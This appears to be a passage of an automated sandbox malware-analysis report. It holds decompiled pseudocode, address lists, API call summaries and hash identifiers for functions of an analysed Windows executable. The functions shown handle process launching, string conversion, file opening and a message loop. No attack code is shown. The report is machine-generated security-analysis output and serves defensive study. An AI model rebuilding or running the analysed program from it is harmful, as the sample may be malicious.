                                                                                                                                                    0x0122cf0d
                                                                                                                                                    0x0122ccbe
                                                                                                                                                    0x0122ccc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cccf
                                                                                                                                                    0x0122ccd2
                                                                                                                                                    0x0122ccda
                                                                                                                                                    0x0122ccdf
                                                                                                                                                    0x0122cce6
                                                                                                                                                    0x0122cce9
                                                                                                                                                    0x0122cced
                                                                                                                                                    0x0122ccf7
                                                                                                                                                    0x0122ccf9
                                                                                                                                                    0x0122ccf9
                                                                                                                                                    0x0122cd01
                                                                                                                                                    0x0122cd04
                                                                                                                                                    0x0122cd07
                                                                                                                                                    0x0122cd0a
                                                                                                                                                    0x0122cd0e
                                                                                                                                                    0x0122cd10
                                                                                                                                                    0x0122cd10
                                                                                                                                                    0x0122cd12
                                                                                                                                                    0x0122cd16
                                                                                                                                                    0x0122cd1b
                                                                                                                                                    0x0122cd53
                                                                                                                                                    0x0122cd53
                                                                                                                                                    0x0122cd57
                                                                                                                                                    0x0122cd5a
                                                                                                                                                    0x0122cd63
                                                                                                                                                    0x0122cd6e
                                                                                                                                                    0x0122cd6e
                                                                                                                                                    0x0122cd63
                                                                                                                                                    0x0122cd77
                                                                                                                                                    0x0122cd84
                                                                                                                                                    0x0122cd88
                                                                                                                                                    0x0122cd99
                                                                                                                                                    0x0122cd99
                                                                                                                                                    0x0122cdac
                                                                                                                                                    0x0122cdbc
                                                                                                                                                    0x0122cdc5
                                                                                                                                                    0x0122cdc5
                                                                                                                                                    0x0122cdce
                                                                                                                                                    0x0122cdd6
                                                                                                                                                    0x0122cddc
                                                                                                                                                    0x0122cde9
                                                                                                                                                    0x0122cdfe
                                                                                                                                                    0x0122ce00
                                                                                                                                                    0x0122ce09
                                                                                                                                                    0x0122ce0d
                                                                                                                                                    0x0122ce13
                                                                                                                                                    0x0122ce13
                                                                                                                                                    0x0122ce09
                                                                                                                                                    0x0122ce1e
                                                                                                                                                    0x0122ce28
                                                                                                                                                    0x0122ce34
                                                                                                                                                    0x0122ce53
                                                                                                                                                    0x0122ce5d
                                                                                                                                                    0x0122ce5f
                                                                                                                                                    0x0122ce5f
                                                                                                                                                    0x0122ce64
                                                                                                                                                    0x0122ce64
                                                                                                                                                    0x0122ce34
                                                                                                                                                    0x0122ce6f
                                                                                                                                                    0x0122ce77
                                                                                                                                                    0x0122ce8f
                                                                                                                                                    0x0122ce96
                                                                                                                                                    0x0122cea4
                                                                                                                                                    0x0122cea4
                                                                                                                                                    0x0122ceec
                                                                                                                                                    0x0122ceec
                                                                                                                                                    0x0122ceec
                                                                                                                                                    0x0122cef5
                                                                                                                                                    0x0122cefe
                                                                                                                                                    0x0122cefe
                                                                                                                                                    0x0122cef5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cf04
                                                                                                                                                    0x0122cd1d
                                                                                                                                                    0x0122cd1f
                                                                                                                                                    0x0122cd27
                                                                                                                                                    0x0122cd2a
                                                                                                                                                    0x0122ceb6
                                                                                                                                                    0x0122ceb6
                                                                                                                                                    0x0122cebb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ceb4
                                                                                                                                                    0x0122cec2
                                                                                                                                                    0x0122cec6
                                                                                                                                                    0x0122cd34
                                                                                                                                                    0x0122cd38
                                                                                                                                                    0x0122ced7
                                                                                                                                                    0x0122cedb
                                                                                                                                                    0x0122cedb
                                                                                                                                                    0x0122cee0
                                                                                                                                                    0x0122cee3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cd38
                                                                                                                                                    0x0122ceb4
                                                                                                                                                    0x0122cebd
                                                                                                                                                    0x0122cd30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cd4a
                                                                                                                                                    0x0122cd4a
                                                                                                                                                    0x0122cd4b
                                                                                                                                                    0x0122cd4e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cd27

                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0122CDCE
                                                                                                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0122CE0D
                                                                                                                                                    • GetExitCodeProcess.KERNEL32 ref: 0122CE49
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0122CE6F
                                                                                                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0122CEFE
                                                                                                                                                      • Part of subcall function 01221708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,0121BA45,00000000,.exe,?,?,00000800,?,?,0122854F,?), ref: 0122171E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                                                                                    • String ID: $.exe$.inf
                                                                                                                                                    • API String ID: 3686203788-2452507128
                                                                                                                                                    • Opcode ID: 844f9356be692b6aacbb4fdea161b3f5634e4908d4c6bedb7d4fa23a100ef502
                                                                                                                                                    • Instruction ID: 482b3598526ab5269615b1023968c9cc5651e187d2a9b56ba386cb9ee8af3f64
                                                                                                                                                    • Opcode Fuzzy Hash: 844f9356be692b6aacbb4fdea161b3f5634e4908d4c6bedb7d4fa23a100ef502
                                                                                                                                                    • Instruction Fuzzy Hash: 8261C2705243A6ABE732DF28D444AAFBFF4AF81704F04481DEAC497199D7B185A4C792
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01239ED8, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                    			E01239ED8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0123E52C(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0122EA8A(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0123A140(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0123A5AC(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0123A140(_t101);
									goto L36;
								}
								_t62 = E0123A5AC(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0123A140(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E01238398(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E01241870();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0123A5AC(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E01238398(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E01241870();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                                                                                                                                                    0x01239edd
                                                                                                                                                    0x01239ede
                                                                                                                                                    0x01239edf
                                                                                                                                                    0x01239ee6
                                                                                                                                                    0x01239eea
                                                                                                                                                    0x01239eeb
                                                                                                                                                    0x01239ef1
                                                                                                                                                    0x01239ef7
                                                                                                                                                    0x01239efd
                                                                                                                                                    0x01239f00
                                                                                                                                                    0x01239f00
                                                                                                                                                    0x01239f03
                                                                                                                                                    0x01239f05
                                                                                                                                                    0x01239f05
                                                                                                                                                    0x01239f03
                                                                                                                                                    0x01239f07
                                                                                                                                                    0x01239f0c
                                                                                                                                                    0x01239f13
                                                                                                                                                    0x01239f16
                                                                                                                                                    0x01239f16
                                                                                                                                                    0x01239f32
                                                                                                                                                    0x01239f38
                                                                                                                                                    0x01239f3d
                                                                                                                                                    0x0123a0d0
                                                                                                                                                    0x0123a0e3
                                                                                                                                                    0x01239f43
                                                                                                                                                    0x01239f43
                                                                                                                                                    0x01239f46
                                                                                                                                                    0x01239f4b
                                                                                                                                                    0x01239f4f
                                                                                                                                                    0x01239fa3
                                                                                                                                                    0x01239fa3
                                                                                                                                                    0x01239fa5
                                                                                                                                                    0x01239fa7
                                                                                                                                                    0x0123a0c5
                                                                                                                                                    0x0123a0c5
                                                                                                                                                    0x0123a0c7
                                                                                                                                                    0x0123a0c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a0ce
                                                                                                                                                    0x01239fb8
                                                                                                                                                    0x01239fbe
                                                                                                                                                    0x01239fc0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239fc6
                                                                                                                                                    0x01239fd8
                                                                                                                                                    0x01239fdd
                                                                                                                                                    0x01239fe1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239fee
                                                                                                                                                    0x0123a028
                                                                                                                                                    0x0123a02b
                                                                                                                                                    0x0123a02e
                                                                                                                                                    0x0123a030
                                                                                                                                                    0x0123a032
                                                                                                                                                    0x0123a034
                                                                                                                                                    0x0123a080
                                                                                                                                                    0x0123a080
                                                                                                                                                    0x0123a082
                                                                                                                                                    0x0123a082
                                                                                                                                                    0x0123a084
                                                                                                                                                    0x0123a0be
                                                                                                                                                    0x0123a0bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a0c4
                                                                                                                                                    0x0123a098
                                                                                                                                                    0x0123a09d
                                                                                                                                                    0x0123a09f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a0a3
                                                                                                                                                    0x0123a0a4
                                                                                                                                                    0x0123a0a5
                                                                                                                                                    0x0123a0a8
                                                                                                                                                    0x0123a0e4
                                                                                                                                                    0x0123a0e7
                                                                                                                                                    0x0123a0aa
                                                                                                                                                    0x0123a0aa
                                                                                                                                                    0x0123a0ab
                                                                                                                                                    0x0123a0ab
                                                                                                                                                    0x0123a0b8
                                                                                                                                                    0x0123a0ba
                                                                                                                                                    0x0123a0bc
                                                                                                                                                    0x0123a0ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a0bc
                                                                                                                                                    0x0123a036
                                                                                                                                                    0x0123a039
                                                                                                                                                    0x0123a03b
                                                                                                                                                    0x0123a03d
                                                                                                                                                    0x0123a03f
                                                                                                                                                    0x0123a042
                                                                                                                                                    0x0123a047
                                                                                                                                                    0x0123a062
                                                                                                                                                    0x0123a064
                                                                                                                                                    0x0123a06e
                                                                                                                                                    0x0123a070
                                                                                                                                                    0x0123a071
                                                                                                                                                    0x0123a073
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a075
                                                                                                                                                    0x0123a07b
                                                                                                                                                    0x0123a07b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a07b
                                                                                                                                                    0x0123a049
                                                                                                                                                    0x0123a04b
                                                                                                                                                    0x0123a04f
                                                                                                                                                    0x0123a054
                                                                                                                                                    0x0123a056
                                                                                                                                                    0x0123a058
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a05a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a05a
                                                                                                                                                    0x01239ff0
                                                                                                                                                    0x01239ff5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239ffb
                                                                                                                                                    0x01239ffd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a014
                                                                                                                                                    0x0123a019
                                                                                                                                                    0x0123a01d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a023
                                                                                                                                                    0x01239f56
                                                                                                                                                    0x01239f58
                                                                                                                                                    0x01239f5a
                                                                                                                                                    0x01239f62
                                                                                                                                                    0x01239f81
                                                                                                                                                    0x01239f83
                                                                                                                                                    0x01239f8d
                                                                                                                                                    0x01239f8f
                                                                                                                                                    0x01239f90
                                                                                                                                                    0x01239f92
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239f98
                                                                                                                                                    0x01239f9e
                                                                                                                                                    0x01239f9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239f9e
                                                                                                                                                    0x01239f66
                                                                                                                                                    0x01239f6a
                                                                                                                                                    0x01239f6f
                                                                                                                                                    0x01239f73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239f79
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239f79

                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01234DDB,01234DDB,?,?,?,0123A129,00000001,00000001,7FE85006), ref: 01239F32
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0123A129,00000001,00000001,7FE85006,?,?,?), ref: 01239FB8
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,7FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0123A0B2
                                                                                                                                                    • __freea.LIBCMT ref: 0123A0BF
                                                                                                                                                      • Part of subcall function 01238398: RtlAllocateHeap.NTDLL(00000000,?,?,?,01233866,?,0000015D,?,?,?,?,01234D42,000000FF,00000000,?,?), ref: 012383CA
                                                                                                                                                    • __freea.LIBCMT ref: 0123A0C8
                                                                                                                                                    • __freea.LIBCMT ref: 0123A0ED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                    • Opcode ID: ee5b63fb361ec757033b3b8eb091e4be77904be1a5d9f27ebc024a59e3afbd31
                                                                                                                                                    • Instruction ID: 7128f167e95b39da2c70b807533990d73f20c562800449953b783f5b45cc955b
                                                                                                                                                    • Opcode Fuzzy Hash: ee5b63fb361ec757033b3b8eb091e4be77904be1a5d9f27ebc024a59e3afbd31
                                                                                                                                                    • Instruction Fuzzy Hash: 7351E3B2620217AFEB258E68DC41FBFBBA9EBC4750B150638FE44DB140EB74DC448690
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219950, Relevance: 7.6, APIs: 5, Instructions: 116filetimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E01219950(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E0122E1C0();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E01217098( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E0121FD96(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E0121B5AC(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














                                                                                                                                                    0x01219950
                                                                                                                                                    0x01219955
                                                                                                                                                    0x0121995b
                                                                                                                                                    0x01219964
                                                                                                                                                    0x01219966
                                                                                                                                                    0x01219971
                                                                                                                                                    0x0121997c
                                                                                                                                                    0x01219978
                                                                                                                                                    0x01219978
                                                                                                                                                    0x01219978
                                                                                                                                                    0x01219982
                                                                                                                                                    0x0121998a
                                                                                                                                                    0x01219992
                                                                                                                                                    0x0121999b
                                                                                                                                                    0x0121999d
                                                                                                                                                    0x0121999d
                                                                                                                                                    0x012199a8
                                                                                                                                                    0x012199ad
                                                                                                                                                    0x012199af
                                                                                                                                                    0x012199af
                                                                                                                                                    0x012199c4
                                                                                                                                                    0x012199c8
                                                                                                                                                    0x012199d1
                                                                                                                                                    0x012199d3
                                                                                                                                                    0x012199d3
                                                                                                                                                    0x012199ec
                                                                                                                                                    0x012199f2
                                                                                                                                                    0x012199f7
                                                                                                                                                    0x01219a5b
                                                                                                                                                    0x01219a60
                                                                                                                                                    0x01219a67
                                                                                                                                                    0x01219a70
                                                                                                                                                    0x01219a7b
                                                                                                                                                    0x01219a7b
                                                                                                                                                    0x01219a86
                                                                                                                                                    0x01219a89
                                                                                                                                                    0x01219a8c
                                                                                                                                                    0x01219a8f
                                                                                                                                                    0x01219a95
                                                                                                                                                    0x01219aa6
                                                                                                                                                    0x01219aaa
                                                                                                                                                    0x01219aaa
                                                                                                                                                    0x01219aba
                                                                                                                                                    0x012199f9
                                                                                                                                                    0x012199ff
                                                                                                                                                    0x01219a1b
                                                                                                                                                    0x01219a4a
                                                                                                                                                    0x01219a4f
                                                                                                                                                    0x01219a51
                                                                                                                                                    0x01219a51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219a4f
                                                                                                                                                    0x01219a34
                                                                                                                                                    0x01219a36
                                                                                                                                                    0x01219a3f
                                                                                                                                                    0x01219a41
                                                                                                                                                    0x01219a41
                                                                                                                                                    0x01219a48
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219a48

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,01217886,?,00000005,?,00000011), ref: 012199EC
                                                                                                                                                    • GetLastError.KERNEL32(?,?,01217886,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 012199F9
                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,01217886,?,00000005,?), ref: 01219A2E
                                                                                                                                                    • GetLastError.KERNEL32(?,?,01217886,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 01219A36
                                                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,01217886,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 01219A7B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1999340476-0
                                                                                                                                                    • Opcode ID: a77fc06149b1aee46833d883561cfcd0c1a5e554684848856219eef503d798c5
                                                                                                                                                    • Instruction ID: 1d04a010e89a538e3c3dd8f7cf2ab40e37a077a6ee6909eb658faf4bb7fb6f2b
                                                                                                                                                    • Opcode Fuzzy Hash: a77fc06149b1aee46833d883561cfcd0c1a5e554684848856219eef503d798c5
                                                                                                                                                    • Instruction Fuzzy Hash: D64146319547476BEB30DF289C09BEABBE5BB21328F100719FAA1961C4D775A4CCCB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122ABC4, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122ABC4() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0x1257438; // 0x16006c
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                                                                                                                                                    0x0122abd5
                                                                                                                                                    0x0122abdd
                                                                                                                                                    0x0122abe6
                                                                                                                                                    0x0122abec
                                                                                                                                                    0x0122abf3
                                                                                                                                                    0x0122ac04
                                                                                                                                                    0x0122ac08
                                                                                                                                                    0x0122ac12
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ac12
                                                                                                                                                    0x0122abfa
                                                                                                                                                    0x0122ac02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ac02
                                                                                                                                                    0x0122ac1c

                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0122ABD5
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0122ABE6
                                                                                                                                                    • IsDialogMessageW.USER32(0016006C,?), ref: 0122ABFA
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0122AC08
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0122AC12
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1266772231-0
                                                                                                                                                    • Opcode ID: 64d6c502085420db05c67f73105eac61fb771bfb40eb4cb44ed629f9ea4c6c39
                                                                                                                                                    • Instruction ID: 4e1c38f33834d3bbebf044213136047b826c6386c7832d631f19b412ae903476
                                                                                                                                                    • Opcode Fuzzy Hash: 64d6c502085420db05c67f73105eac61fb771bfb40eb4cb44ed629f9ea4c6c39
                                                                                                                                                    • Instruction Fuzzy Hash: 22F01771A1126AAB9B30ABE7AC4CDEB7F6CEE052917404015FA09D3404E638D015CBF0
